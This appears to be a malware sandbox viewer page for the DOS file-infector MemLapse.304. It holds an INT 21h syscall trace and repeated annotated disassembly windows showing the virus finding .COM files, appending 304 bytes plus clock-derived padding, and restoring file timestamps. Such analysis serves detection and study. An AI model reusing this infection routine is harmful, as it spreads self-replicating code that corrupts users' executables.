Sample viewer

vx.netlux.org/Virus.DOS.MemLapse.304


Syscalls:

Time | Syscall Op (INT 21h function number from AH, in decimal) | PC | Syscall Name
2018-12-17T22:57:07.14369804Z 26 PC: 12a6c | Set disk transfer address
2018-12-17T22:57:07.145444503Z 78 PC: 12a75 | Find first file
2018-12-17T22:57:07.152007763Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.153649459Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.158764676Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.162428404Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.182364153Z 61 PC: 12aa6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:57:07.190430569Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.198572746Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.200086191Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.201567456Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.20517024Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.206900643Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.216224873Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
; Disassembly window captured at the first "Get time" row; the row directly above
; holds its first instruction (0x12b02: mov cl, dl). Handle 5 was opened as
; 'SLEEP.COM' earlier in the trace. The routine begins before this window and runs
; past it, so BX and DS on entry are not visible here.
; Logged PCs are the address after each int 0x21 (int at 0x12b09 -> "PC: 12b0b").
0x12b04: mov al, cl                  ; AL = CL, then overwritten by the AX load below
0x12b06: mov ax, 0x2c00              ; AH = 2Ch, DOS get system time (trace op 44)
0x12b09: int 0x21
0x12b0b: mov cl, dl                  ; DL = hundredths of a second from the time call
0x12b0d: add cl, al                  ; adds AL as left by the call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; clock-derived extra write after the 304-byte write at PC 12afd
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes, so mtime is a weak indicator
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; window is cut off here; consumer of DX is not shown
2018-12-17T22:57:07.219452461Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
; Disassembly window captured at the second "Get time" row; the row directly above
; holds its first instruction (0x12b0b: mov cl, dl, i.e. CL = hundredths of a second).
; The trace row after this window logs the resulting write: 163 bytes on handle 5.
; BX and DS are set outside this window and are not visible here.
0x12b0d: add cl, al                  ; adds AL as left by the time call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; variable-length write: per-file size growth is not constant
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes; compare file contents, not mtime
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; DS:DX = path string at 0x21b; its contents are not on this page
0x12b32: mov ah, 0x3b                ; AH = 3Bh, DOS change current directory (trace op 59)
0x12b34: int 0x21
0x12b36: jb 0x12b3b                  ; carry set = directory change failed; target outside this window
0x12b38: jmp 0x12a6d                 ; otherwise jumps back near the search calls logged at PC 12a6c/12a75
2018-12-17T22:57:07.221959484Z 64 PC: 12b19 | Write file or device (Write 163 bytes on handle 5)
2018-12-17T22:57:07.225230473Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.22764894Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.236453002Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.239398379Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.241214814Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.244533774Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.246122431Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.249075663Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.25123902Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.262370708Z 61 PC: 12aa6 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:57:07.269692353Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.277431433Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.279181403Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.280983421Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.285470196Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.287310555Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.290257005Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
; Disassembly window captured at the first "Get time" row; the row directly above
; holds its first instruction (0x12b02: mov cl, dl). Handle 5 was opened as
; 'PRINT.COM' earlier in the trace. The routine begins before this window and runs
; past it, so BX and DS on entry are not visible here.
; Logged PCs are the address after each int 0x21 (int at 0x12b09 -> "PC: 12b0b").
0x12b04: mov al, cl                  ; AL = CL, then overwritten by the AX load below
0x12b06: mov ax, 0x2c00              ; AH = 2Ch, DOS get system time (trace op 44)
0x12b09: int 0x21
0x12b0b: mov cl, dl                  ; DL = hundredths of a second from the time call
0x12b0d: add cl, al                  ; adds AL as left by the call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; clock-derived extra write after the 304-byte write at PC 12afd
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes, so mtime is a weak indicator
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; window is cut off here; consumer of DX is not shown
2018-12-17T22:57:07.292818581Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
; Disassembly window captured at the second "Get time" row; the row directly above
; holds its first instruction (0x12b0b: mov cl, dl, i.e. CL = hundredths of a second).
; The trace row after this window logs the resulting write: 38 bytes on handle 5.
; BX and DS are set outside this window and are not visible here.
0x12b0d: add cl, al                  ; adds AL as left by the time call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; variable-length write: per-file size growth is not constant
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes; compare file contents, not mtime
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; DS:DX = path string at 0x21b; its contents are not on this page
0x12b32: mov ah, 0x3b                ; AH = 3Bh, DOS change current directory (trace op 59)
0x12b34: int 0x21
0x12b36: jb 0x12b3b                  ; carry set = directory change failed; target outside this window
0x12b38: jmp 0x12a6d                 ; otherwise jumps back near the search calls logged at PC 12a6c/12a75
2018-12-17T22:57:07.294991777Z 64 PC: 12b19 | Write file or device (Write 38 bytes on handle 5)
2018-12-17T22:57:07.297495093Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.301665022Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.307837296Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.310609518Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.313080554Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.31642943Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.317958985Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.32768476Z 61 PC: 12aa6 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:57:07.335177817Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.342371612Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.344223103Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.346547092Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.349751246Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.351668039Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.355703597Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
; Disassembly window captured at the first "Get time" row; the row directly above
; holds its first instruction (0x12b02: mov cl, dl). Handle 5 was opened as
; 'HELLO.COM' earlier in the trace. The routine begins before this window and runs
; past it, so BX and DS on entry are not visible here.
; Logged PCs are the address after each int 0x21 (int at 0x12b09 -> "PC: 12b0b").
0x12b04: mov al, cl                  ; AL = CL, then overwritten by the AX load below
0x12b06: mov ax, 0x2c00              ; AH = 2Ch, DOS get system time (trace op 44)
0x12b09: int 0x21
0x12b0b: mov cl, dl                  ; DL = hundredths of a second from the time call
0x12b0d: add cl, al                  ; adds AL as left by the call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; clock-derived extra write after the 304-byte write at PC 12afd
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes, so mtime is a weak indicator
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; window is cut off here; consumer of DX is not shown
2018-12-17T22:57:07.35857772Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
; Disassembly window captured at the second "Get time" row; the row directly above
; holds its first instruction (0x12b0b: mov cl, dl, i.e. CL = hundredths of a second).
; The trace row after this window logs the resulting write: 38 bytes on handle 5.
; BX and DS are set outside this window and are not visible here.
0x12b0d: add cl, al                  ; adds AL as left by the time call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; variable-length write: per-file size growth is not constant
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes; compare file contents, not mtime
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; DS:DX = path string at 0x21b; its contents are not on this page
0x12b32: mov ah, 0x3b                ; AH = 3Bh, DOS change current directory (trace op 59)
0x12b34: int 0x21
0x12b36: jb 0x12b3b                  ; carry set = directory change failed; target outside this window
0x12b38: jmp 0x12a6d                 ; otherwise jumps back near the search calls logged at PC 12a6c/12a75
2018-12-17T22:57:07.36131199Z 64 PC: 12b19 | Write file or device (Write 38 bytes on handle 5)
2018-12-17T22:57:07.365111183Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.36857774Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.37764124Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.381247529Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.382655096Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.385551722Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.387202105Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.399282696Z 61 PC: 12aa6 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:57:07.406237231Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.412872595Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.415124399Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.416610623Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.419350875Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.421515164Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.424187448Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
; Disassembly window captured at the first "Get time" row; the row directly above
; holds its first instruction (0x12b02: mov cl, dl). Handle 5 was opened as
; 'PHANG.COM' earlier in the trace. The routine begins before this window and runs
; past it, so BX and DS on entry are not visible here.
; Logged PCs are the address after each int 0x21 (int at 0x12b09 -> "PC: 12b0b").
0x12b04: mov al, cl                  ; AL = CL, then overwritten by the AX load below
0x12b06: mov ax, 0x2c00              ; AH = 2Ch, DOS get system time (trace op 44)
0x12b09: int 0x21
0x12b0b: mov cl, dl                  ; DL = hundredths of a second from the time call
0x12b0d: add cl, al                  ; adds AL as left by the call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; clock-derived extra write after the 304-byte write at PC 12afd
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes, so mtime is a weak indicator
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; window is cut off here; consumer of DX is not shown
2018-12-17T22:57:07.426290311Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
; Disassembly window captured at the second "Get time" row; the row directly above
; holds its first instruction (0x12b0b: mov cl, dl, i.e. CL = hundredths of a second).
; The trace row after this window logs the resulting write: 41 bytes on handle 5.
; BX and DS are set outside this window and are not visible here.
0x12b0d: add cl, al                  ; adds AL as left by the time call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; variable-length write: per-file size growth is not constant
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes; compare file contents, not mtime
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; DS:DX = path string at 0x21b; its contents are not on this page
0x12b32: mov ah, 0x3b                ; AH = 3Bh, DOS change current directory (trace op 59)
0x12b34: int 0x21
0x12b36: jb 0x12b3b                  ; carry set = directory change failed; target outside this window
0x12b38: jmp 0x12a6d                 ; otherwise jumps back near the search calls logged at PC 12a6c/12a75
2018-12-17T22:57:07.428799218Z 64 PC: 12b19 | Write file or device (Write 41 bytes on handle 5)
2018-12-17T22:57:07.432359482Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.43406085Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.443776296Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.44761337Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.449106046Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.452856587Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.45466669Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.457676819Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.459218177Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.47023036Z 61 PC: 12aa6 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:57:07.477529543Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.491697268Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.494668685Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.496508133Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.499476744Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.502412593Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.505806874Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
; Disassembly window captured at the first "Get time" row; the row directly above
; holds its first instruction (0x12b02: mov cl, dl). Handle 5 was opened as
; 'PRINTA~1.COM' earlier in the trace. The routine begins before this window and
; runs past it, so BX and DS on entry are not visible here.
; Logged PCs are the address after each int 0x21 (int at 0x12b09 -> "PC: 12b0b").
0x12b04: mov al, cl                  ; AL = CL, then overwritten by the AX load below
0x12b06: mov ax, 0x2c00              ; AH = 2Ch, DOS get system time (trace op 44)
0x12b09: int 0x21
0x12b0b: mov cl, dl                  ; DL = hundredths of a second from the time call
0x12b0d: add cl, al                  ; adds AL as left by the call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; clock-derived extra write after the 304-byte write at PC 12afd
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes, so mtime is a weak indicator
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; window is cut off here; consumer of DX is not shown
2018-12-17T22:57:07.508653727Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
; Disassembly window captured at the second "Get time" row; the row directly above
; holds its first instruction (0x12b0b: mov cl, dl, i.e. CL = hundredths of a second).
; The trace row after this window logs the resulting write: 171 bytes on handle 5.
; BX and DS are set outside this window and are not visible here.
0x12b0d: add cl, al                  ; adds AL as left by the time call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; variable-length write: per-file size growth is not constant
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes; compare file contents, not mtime
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; DS:DX = path string at 0x21b; its contents are not on this page
0x12b32: mov ah, 0x3b                ; AH = 3Bh, DOS change current directory (trace op 59)
0x12b34: int 0x21
0x12b36: jb 0x12b3b                  ; carry set = directory change failed; target outside this window
0x12b38: jmp 0x12a6d                 ; otherwise jumps back near the search calls logged at PC 12a6c/12a75
2018-12-17T22:57:07.512018733Z 64 PC: 12b19 | Write file or device (Write 171 bytes on handle 5)
2018-12-17T22:57:07.516209903Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.517906472Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.526350087Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.529143498Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.530695306Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.542105788Z 61 PC: 12aa6 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:57:07.547565472Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.553965234Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.555789173Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.560540085Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.563668666Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.56541537Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.577546647Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
; Disassembly window captured at the first "Get time" row; the row directly above
; holds its first instruction (0x12b02: mov cl, dl). Handle 5 was opened as
; 'MANDEL.COM' earlier in the trace. The routine begins before this window and runs
; past it, so BX and DS on entry are not visible here.
; Logged PCs are the address after each int 0x21 (int at 0x12b09 -> "PC: 12b0b").
0x12b04: mov al, cl                  ; AL = CL, then overwritten by the AX load below
0x12b06: mov ax, 0x2c00              ; AH = 2Ch, DOS get system time (trace op 44)
0x12b09: int 0x21
0x12b0b: mov cl, dl                  ; DL = hundredths of a second from the time call
0x12b0d: add cl, al                  ; adds AL as left by the call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; clock-derived extra write after the 304-byte write at PC 12afd
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes, so mtime is a weak indicator
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; window is cut off here; consumer of DX is not shown
2018-12-17T22:57:07.580041488Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
; Disassembly window captured at the second "Get time" row; the row directly above
; holds its first instruction (0x12b0b: mov cl, dl, i.e. CL = hundredths of a second).
; The trace row after this window logs the resulting write: 46 bytes on handle 5.
; BX and DS are set outside this window and are not visible here.
0x12b0d: add cl, al                  ; adds AL as left by the time call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; variable-length write: per-file size growth is not constant
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes; compare file contents, not mtime
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; DS:DX = path string at 0x21b; its contents are not on this page
0x12b32: mov ah, 0x3b                ; AH = 3Bh, DOS change current directory (trace op 59)
0x12b34: int 0x21
0x12b36: jb 0x12b3b                  ; carry set = directory change failed; target outside this window
0x12b38: jmp 0x12a6d                 ; otherwise jumps back near the search calls logged at PC 12a6c/12a75
2018-12-17T22:57:07.582367611Z 64 PC: 12b19 | Write file or device (Write 46 bytes on handle 5)
2018-12-17T22:57:07.590627269Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.593570262Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.60269114Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.607573348Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.609035878Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.620262024Z 61 PC: 12aa6 | Open file (Filename = 'PAH.COM')
2018-12-17T22:57:07.62860053Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.636076325Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.637985314Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.640082927Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.643668188Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.645340151Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.648757125Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
; Disassembly window captured at the first "Get time" row; the row directly above
; holds its first instruction (0x12b02: mov cl, dl). Handle 5 was opened as
; 'PAH.COM' earlier in the trace. The routine begins before this window and runs
; past it, so BX and DS on entry are not visible here.
; Logged PCs are the address after each int 0x21 (int at 0x12b09 -> "PC: 12b0b").
0x12b04: mov al, cl                  ; AL = CL, then overwritten by the AX load below
0x12b06: mov ax, 0x2c00              ; AH = 2Ch, DOS get system time (trace op 44)
0x12b09: int 0x21
0x12b0b: mov cl, dl                  ; DL = hundredths of a second from the time call
0x12b0d: add cl, al                  ; adds AL as left by the call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
